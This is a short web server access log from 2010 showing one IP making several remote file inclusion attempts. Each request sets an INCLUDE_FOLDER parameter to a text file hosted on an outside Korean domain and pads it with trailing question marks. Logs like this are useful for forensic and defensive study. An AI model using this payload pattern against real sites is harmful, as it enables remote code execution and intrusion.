200.93.147.154 - - [07/Mar/2010:06:15:28 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:15:29 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:06:16:18 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
